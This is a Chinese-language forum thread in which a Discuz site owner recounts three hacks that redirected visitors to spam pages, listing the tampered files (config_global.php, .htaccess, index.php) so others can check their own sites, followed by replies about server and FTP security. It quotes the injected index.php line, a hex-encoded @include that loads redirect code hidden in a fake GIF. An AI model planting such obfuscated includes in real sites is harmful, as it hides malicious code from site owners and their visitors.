記錄這一年來自己論壇被黑 跳轉(zhuǎn)垃圾網(wǎng)頁的問題

lookbear

DZ論壇現(xiàn)在已經(jīng)是高危的程序
這可能跟多年不更新有關(guān)系，從來沒有哪個時候像今年一樣反復(fù)被黑！
目前已經(jīng)開啟了 ESET殺毒軟件，希望不會了

在此寫下三次論壇網(wǎng)頁被修改的樣式，以備大家參考！

這三次被黑，表現(xiàn)都是訪問網(wǎng)頁會跳轉(zhuǎn)到垃圾頁面，但是都很隱蔽，有的會偶爾彈出，有的會選擇只在手機端彈出等等！

1. config/config_global.php   被篡改
在 config_global.php 文件底部會出現(xiàn)一些超長的不正常代碼，對比一下正版文件就可以發(fā)現(xiàn)異常

2..htaccess   文件被篡改， 因為已經(jīng)被刪除，記不得添加了哪兩句，自行對比下

3.前幾天的發(fā)生的，  INDEX.PHP 被篡改。

1. @include(PACK('H*','2e2f7374617469632f696d6167652f636f6d6d6f6e2f6e6f696d672e676966'));

復(fù)制代碼

經(jīng)過查詢，是執(zhí)行一個

1. @include(PACK('H*','./static/image/common/noimg.gif'));

復(fù)制代碼

經(jīng)過查詢，noimg.gif根本不是圖片，里邊存有跳轉(zhuǎn)代碼。

多事之秋，各種病毒泛濫，對于DZ這個老程序真是千瘡百孔，把這些分享給大家。因為就算你殺了毒，不找出被篡改的文件，也是枉然！

羅永浩

想轉(zhuǎn)WP了，昨晚看了一晚上的主題先收藏起來，到時候移過來

guessxiaohuang

好像也沒錯哦，HTML5在國外已經(jīng)被大量網(wǎng)站使用了，看了下discuz內(nèi)部代碼，居然沒有跟進，的確慢慢的就落后了

lemon

牛逼網(wǎng)站時常被人掂記，我的網(wǎng)站5 6年都沒人來黑。

Killer

文件被修改基本都是服務(wù)器本身安全沒做好，而非DZ被黑，加強服務(wù)器安全防止被入侵是關(guān)鍵，不然任何程序都會被黑的

鴻茂傳媒

服務(wù)器沒有做好安全。

guessxiaohuang

Killer 發(fā)表于 2020-3-24 23:13
文件被修改基本都是服務(wù)器本身安全沒做好，而非DZ被黑，加強服務(wù)器安全防止被入侵是關(guān)鍵，不然任何程序都會 ...

我贊同你的說法，discuz安全性我也測試過，99%的攻擊方法都沒什么用，他的這個應(yīng)該是FTP密碼被別人知道了，然后被上傳木馬文件，他不徹底清除惡意代碼的話，就只能重裝了

dss

樓主用哪里的服務(wù)器建站？

simonzhd

說的我怕怕的